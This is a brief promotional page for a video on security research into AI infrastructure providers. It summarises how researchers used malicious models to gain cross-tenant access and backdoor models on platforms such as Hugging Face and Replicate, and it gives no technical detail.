Month of AI Video – Hacking AI Infrastructure Providers for Fun

Banner for Chats with AI

An increasing number of companies are adopting AI-as-a-Service solutions to collaborate, train, and operate their artificial intelligence applications. From emerging AI startups like Hugging Face and Replicate to established cloud providers such as Microsoft Azure and SAP, thousands of customers place their trust in these services, relying on them to handle their proprietary models and datasets. This reliance makes these platforms appealing targets for attackers.

Over the past year, researchers have been investigating leading AI service providers with a critical question in mind: How vulnerable are these services to attacks that could compromise their security and expose sensitive customer data?

In this video, the researchers will present a novel attack technique that has been successfully demonstrated on several prominent AI service providers, including Hugging Face and Replicate. On each platform, they utilized malicious models to breach security boundaries and navigate laterally within the underlying infrastructure of the service. This approach enabled them to gain cross-tenant access to customers’ private data, which included private models, weights, datasets, and even user prompts. Additionally, by obtaining global write privileges on these services, they were able to backdoor popular models and initiate supply-chain attacks, impacting both AI researchers and end-users.